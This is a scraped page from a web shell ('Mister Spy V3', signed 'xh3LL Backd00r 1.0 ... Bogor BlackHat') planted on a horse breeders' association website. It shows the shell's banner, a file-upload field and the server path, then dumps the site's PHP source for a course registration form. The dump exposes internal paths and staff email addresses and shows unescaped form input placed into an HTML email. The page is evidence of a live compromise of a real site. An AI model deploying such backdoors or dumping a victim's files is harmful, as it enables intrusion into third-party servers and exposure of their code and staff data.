Mister Spy Say ="Hello Kids ... :D" ___ ____ _ _____ | \/ (_) | | / ___| | . . |_ ___| |_ ___ _ __ \ `--. _ __ _ _ | |\/| | / __| __/ _ \ '__| `--. \ '_ \| | | | | | | | \__ \ || __/ | /\__/ / |_) | |_| | \_| |_/_|___/\__\___|_| \____/| .__/ \__, | | | __/ | |_| |___/ Bot Mister Spy V3
Mister Spy

Mister Spy

Current Path : /home/caballoscriollos/www/espanol/
Upload File :
Current File : /home/caballoscriollos/www/espanol/form_curso_biometrias_analizador.php

<?php

require_once("../funcs_email.php");
require_once("../config.php");
require_once("library/class.cursobiometria.php");
require_once("library/class.cursobiometrias.php");

$Apellido			= mysql_real_escape_string($_POST['apellido']);
$Nombre				= mysql_real_escape_string($_POST['nombre']);

$fechaActual = date('Ymd');
if ($_POST['radio'] == '0')
{
	$Categoria			=  'Socio';
	$NumeroSocio		= mysql_real_escape_string($_POST['institucion2']);
	if ($fechaActual <= '20140310') 
		$ImporteAPagar		= 160;
	else
		$ImporteAPagar		= 200;
}
elseif ($_POST['radio'] == '1')
{
	$Categoria			=  'Hijo de Socio';
	$NumeroSocio		= mysql_real_escape_string($_POST['institucion3']);
	if ($fechaActual <= '20140310') 
		$ImporteAPagar		= 200;
	else
		$ImporteAPagar		= 250;
}
else
{
	$Categoria			=  'No Socio';
	if ($fechaActual <= '20140310') 
		$ImporteAPagar		= 250;
	else
		$ImporteAPagar		= 280;
}

$Fecha				= date('Y-m-d');
$DNI				= mysql_real_escape_string($_POST['dni']);
$FechaNacimiento	= mysql_real_escape_string($_POST['nac']);
$Email				= mysql_real_escape_string($_POST['mail']);
$Telefono			= mysql_real_escape_string($_POST['tel']);
$Domicilio			= mysql_real_escape_string($_POST['domicilio']);
$Ciudad				= mysql_real_escape_string($_POST['ciudad']);


$mensaje="<style type='text/css'>
<!--
.style1 {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 12px;
	color: #7c7c7c;
}
.style2 {
	color: #1e6a9e;
	font-weight: bold;
}

.style3 {
	color: #004765;
	font-weight: bold;
}

-->
</style>";
	

	$de= "sitioweb@caballoscriollos.com";
	$para= "icilley@caballoscriollos.com";
	$para= "lalvarez@caballoscriollos.com";
 	$asunto= "[ASOCIACION CRIADORES DE CABALLOS CRIOLLOS :: CURSO BIOMETRIAS]";
    $mensaje .= "<span class='style1'> <span class='style3'> FORMULARIO DE CURSO BIOMETRIAS: </span>"."<BR>"."<BR>";	
	$mensaje .= "Apellido: <strong>".$_POST['apellido']."</strong><BR>";
	$mensaje .= "Nombre: <strong>".$_POST['nombre']."</strong><BR>";
	$mensaje .= "DNI: <strong>".$_POST['dni']."</strong><BR>";
	$mensaje .= "Fecha de nacimiento: <strong>".$_POST['nac']."</strong><BR>";
	$mensaje .= "Email: <strong>".$_POST['mail']."</strong><BR>";
	$mensaje .= "Telefono: <strong>".$_POST['tel']."</strong><BR>";
	$mensaje .= "Domicilio: <strong>".$_POST['domicilio']."</strong><BR>";
	$mensaje .= "Ciudad: <strong>".$_POST['ciudad']."</strong><BR>";
	$mensaje .= "Residencia: <strong>".$_POST['residencia']."</strong><BR>";
	$mensaje .= "Profesion: <strong>".$_POST['profesion']."</strong><BR>";
	$mensaje .= "Cargo: <strong>".$_POST['cargo']."</strong><BR>";
	$mensaje .= "Institucion: <strong>".$_POST['institucion']."</strong><BR>";
	$cat = '';
	if ($_POST['radio'] == '0')
		$cat = 'Socio';
	elseif ($_POST['radio'] == '1')
		$cat = 'Hijo de Socio';
	elseif ($_POST['radio'] == '2')
		$cat = 'No Socio';
	$mensaje .= "Categoria de Inscripcion: <strong>".$cat."</strong><BR>";
	if ($_POST['radio'] == '0') 
		$mensaje .= "Nro. Socio: <strong>".$_POST['institucion2']."</strong><BR>";
	elseif ($_POST['radio'] == '1') 
		$mensaje .= "Nro. Socio: <strong>".$_POST['institucion3']."</strong><BR>";
	elseif ($_POST['radio'] == '2') {
		$mensaje .= "Razon Social: <strong>".$_POST['rs']."</strong><BR>";
		$mensaje .= "CUIT: <strong>".$_POST['cuit']."</strong><BR>";
		$mensaje .= "Direccion Comercial: <strong>".$_POST['dc']."</strong><BR>";
	}
	$formato= "1";
	
	//enviarEmail( $de, $para, $asunto, $mensaje, $formato);

	header("Location: form_curso_biometrias_gracias.php");
?>

Mr. DellatioNx196 GaLers xh3LL Backd00r 1.0, Coded By Mr. DellatioNx196 - Bogor BlackHat